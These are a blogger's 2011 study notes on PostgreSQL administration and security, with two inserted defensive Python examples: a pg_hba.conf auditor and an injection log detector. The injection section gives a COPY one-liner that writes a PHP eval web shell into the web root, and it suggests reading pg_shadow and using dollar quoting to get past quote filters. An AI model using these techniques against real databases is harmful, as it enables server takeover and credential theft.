Author: LengF PostTime: 2011-08-17
I believe MySQL and MSSQL get the most attention, and Oracle has its share too. Some databases, however, are "rare": DB2, PostgreSQL, Sybase ASE, Informix. Without knowing the features of such a database there is no talking about injection or administration. This article is only part of my study notes: when I ran into PostgreSQL I read the official documentation and some online material carefully, and I am sharing those notes here. It covers only PostgreSQL on the Linux platform.
1. PostgreSQL Overview
PostgreSQL is an RDBMS derived from Berkeley's Postgres project. Early versions were Postgres 4.2 and Postgres95; later versions replaced the original query language (PostQUEL) with SQL and added the interactive psql client. The test platform for this article is PostgreSQL 8.4 on Ubuntu 10.04.
(1) Common default installation paths
/usr/lib/postgresql/8.4    # default path on my Ubuntu
/usr/syno/pgsql/           # default path on a Synology NAS
If you do not know where it is installed, run the following command (the find command also works):
Knowing the default path matters because some Linux systems (I have run into them) do not put the psql command on the user's PATH, and the interactive psql is needed for administration.
The default port is 5432. Networking is disabled by default; to enable it, set tcpip_socket to true and set the listen_addresses parameter. SSL can be used for the connection.
(2) Permissions
PostgreSQL does not allow logging in or running as root on Linux (for security reasons). Installation normally creates a low-privilege user named postgres by default. Three terms matter when talking about permissions: the frontend (client), the postmaster, and the backend. The postmaster and the backend are distinct roles even though they may be implemented by the same program. The frontend first talks to the postmaster and states which database it wants to connect to; the postmaster verifies whether that access is permitted. Once the frontend has authenticated, the postmaster spawns a backend process and hands the connection over to it. From then on queries and results flow between frontend and backend, and the postmaster is no longer involved.
(3) Files and directories
Only security-related files are listed here: the configuration files and the data directories the database stores. These directory values are sometimes held in the $PGDATA environment variable, so the data and configuration files can sometimes be located by running:
echo $PGDATA
I did not test this environment variable because I had no database or configuration information at hand. The important files are listed below.
/data/pg_hba.conf      # records which hosts and users are allowed or denied access, including the authentication method
/data/postmaster.conf  # postmaster configuration
/data/pg_ident.conf    # mapping between database users and system users
/data/PG_VERSION       # version information
/global/pg_database    # mapping between database names and paths
The default database names are:
/global/pg_group       # user groups
/global/pg_pwd         # user names
/global/pg_shadow      # user passwords
Directory layouts differ between environments; you need to locate them and adapt accordingly.
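Since pg_hba.conf decides which hosts and users get in and with what authentication, it is the first file worth auditing. As an added example (not from the original article), a small Python checker that parses a constructed pg_hba.conf and flags rules that use no or cleartext authentication, match every client address, or expose the postgres superuser over the network; only the CIDR address form is handled, which is an assumption of this example.

```python
"""Audit pg_hba.conf access rules for risky settings.
Added example, not part of the original article. The HBA text below is
constructed for the demonstration; a real file lives in $PGDATA."""
import ipaddress

# Constructed sample: two sound rules followed by two risky ones.
SAMPLE_HBA = """\
# TYPE  DATABASE  USER      ADDRESS         METHOD
local   all       postgres                  ident
host    all       all       127.0.0.1/32    md5
host    all       all       0.0.0.0/0       trust
host    all       postgres  10.0.0.0/8      password
"""

# trust = no authentication at all; password = cleartext over the wire
WEAK_METHODS = {"trust", "password"}


def parse_hba(text):
    """Return (type, database, user, address, method) tuples; comments skipped.
    Only the CIDR address form is handled (an assumption of this example)."""
    rules = []
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if not fields:
            continue
        if fields[0] == "local":  # Unix-socket rules carry no ADDRESS column
            rules.append((fields[0], fields[1], fields[2], None, fields[3]))
        else:
            rules.append(tuple(fields[:5]))
    return rules


def audit_hba(text):
    """Return a list of (rule, reason) findings for rules that need attention."""
    findings = []
    for rule in parse_hba(text):
        rtype, _db, user, addr, method = rule
        if method in WEAK_METHODS:
            findings.append((rule, f"weak auth method '{method}'"))
        if addr is not None:
            try:
                if ipaddress.ip_network(addr, strict=False).prefixlen == 0:
                    findings.append((rule, "rule matches every client address"))
            except ValueError:
                pass  # hostname or netmask form: not checked by this example
        if rtype.startswith("host") and user == "postgres" and method in WEAK_METHODS:
            findings.append((rule, "superuser reachable over the network without strong auth"))
    return findings


if __name__ == "__main__":
    for rule, reason in audit_hba(SAMPLE_HBA):
        print(" ".join(f for f in rule if f), "->", reason)
```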
2. Simple Management
First, you cannot administer the database through the root account; you must switch to the user that runs PostgreSQL, at the highest or a lower privilege level (there must, of course, be a mapping for that user). Common users are postgres and admin. Run:
/usr/lib/postgresql/8.4/bin/psql [database]
If an existing database name follows, that database is opened for management; if it is omitted, psql connects to the database whose name matches the user name. Common commands:
\copyright   # version and copyright
\h           # SQL command help, same as help
\?           # list psql commands
\q           # quit the current session
Entering \? shows the psql help, which includes:
\e [FILE]        # edit the query buffer or FILE with an external editor
\f [FUNCNAME]    # function editing
\p               # show the query buffer
\r               # clear the query buffer
\s [FILE]        # display history or save it to FILE
\w FILE          # write the query buffer to FILE
\copy ...        # perform SQL COPY with the data stream to the client host
\echo [STRING]   # write the string to standard output
\i FILE          # execute commands from FILE
\o [FILE]        # send all query results to FILE
Frequently used commands inside a database:
\l            # list all databases on the server
\c database   # connect to a database
\dt           # list all tables
\d table      # describe a table
Other SQL statements are similar to those of other databases, so I will not go into them.
3. Export and Import Databases
pg_dump database > /home/LengF/pgbackup/database.bak                   # back up one database
pg_dumpall > /home/LengF/pgbackup/all.bak                              # back up all databases
pg_dump database | split -b 500k - /home/LengF/pgbackup/database.bak   # back up and split the file into 500 KB pieces
psql database < backup_file_path                                       # restore from a backup
That is the basic management.
4. PostgreSQL Injection Features
- The syntax for injected SQL is basically the same as for other databases.
- /* */ and -- comments are supported; \g marks the end of a statement in psql; the string concatenation operator is || (similar to + in MSSQL).
- Built-in functions: current_database(), session_user, current_user.
- Do not forget to query pg_user, pg_group, pg_shadow and the pg_database mentioned above.
- Files can be written as with other databases; remember the COPY command above?
  COPY (SELECT '<?php eval($_POST[a]); ?>') TO '/var/www/lf.php';
- Files can also be read with pg_read_file(), though this function is generally not recommended.
- The common stack is PHP + PostgreSQL, so magic_quotes_gpc (GPC) has to be considered, but do not be afraid: single quotes can be replaced with $ (dollar quoting) to get around it.
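Every item in the list above leaves a trace in the statement log, so with log_statement = 'all' a defender can watch for them. Added example, not from the original post: a Python detector that parses constructed PostgreSQL log lines and reports which of the listed features (comments, ||, dollar quoting, catalog reads, COPY ... TO and pg_read_file) each statement uses; the log_line_prefix layout is an assumption.

```python
"""Flag PostgreSQL statement-log lines that show the injection features
listed in the article. Added example, not part of the original post; the
log lines are constructed and the log_line_prefix layout is assumed."""
import re

# (pattern, reason) pairs checked against the SQL text of each statement
INDICATORS = [
    (re.compile(r"\bcopy\b.*\bto\s+'", re.I | re.S), "COPY ... TO file (server-side write)"),
    (re.compile(r"\bpg_read_file\s*\(", re.I), "pg_read_file() call (server-side read)"),
    (re.compile(r"\bpg_(shadow|user|group|authid)\b", re.I), "reads credential/role catalog"),
    (re.compile(r"\$[A-Za-z_]*\$"), "dollar quoting (quote-filter bypass)"),
    (re.compile(r"\|\|"), "string concatenation with ||"),
    (re.compile(r"--|/\*"), "inline SQL comment"),
    (re.compile(r"\bcurrent_database\s*\(|\bsession_user\b|\bcurrent_user\b", re.I),
     "fingerprinting function"),
]

# Assumed log_line_prefix = '%t [%p] %u@%d ' with log_statement = 'all'
LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>\S+)@(?P<db>\S+) "
    r"LOG:  statement: (?P<sql>.*)$"
)

# Constructed sample log: one benign query, then four that should be flagged
SAMPLE_LOG = [
    "2011-08-17 10:00:01 CST [1234] webapp@shop LOG:  statement: SELECT name, price FROM items WHERE id = 42",
    "2011-08-17 10:00:02 CST [1234] webapp@shop LOG:  statement: SELECT current_user || '@' || current_database()--",
    "2011-08-17 10:00:03 CST [1234] webapp@shop LOG:  statement: COPY (SELECT $$x$$) TO '/tmp/out.txt'",
    "2011-08-17 10:00:04 CST [1234] webapp@shop LOG:  statement: SELECT pg_read_file('postgresql.conf', 0, 200)",
    "2011-08-17 10:00:05 CST [1234] webapp@shop LOG:  statement: SELECT usename, passwd FROM pg_shadow",
]


def analyze_line(line):
    """Parse one log line; return a dict with the matched indicator reasons, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    sql = m.group("sql")
    hits = [reason for pat, reason in INDICATORS if pat.search(sql)]
    return {"user": m.group("user"), "db": m.group("db"), "sql": sql, "hits": hits}


def scan(lines):
    """Return the analyses of every line that triggered at least one indicator."""
    return [r for r in map(analyze_line, lines) if r and r["hits"]]


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(f"{r['user']}@{r['db']}: {', '.join(r['hits'])}\n    {r['sql']}")
```

The || and comment indicators also fire on legitimate SQL, so treat them as weak signals to correlate with the stronger ones (COPY ... TO, pg_read_file, catalog reads) rather than as alerts on their own.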
A SQL injection summary is also recommended: http://www.bkjia.com/Article/201108/100716.html
This article concentrates on describing PostgreSQL's security-related features; exploitation is something you need to experiment with and practice on your own. Once you have mastered this database, can you carry the knowledge over to other databases? End of rambling.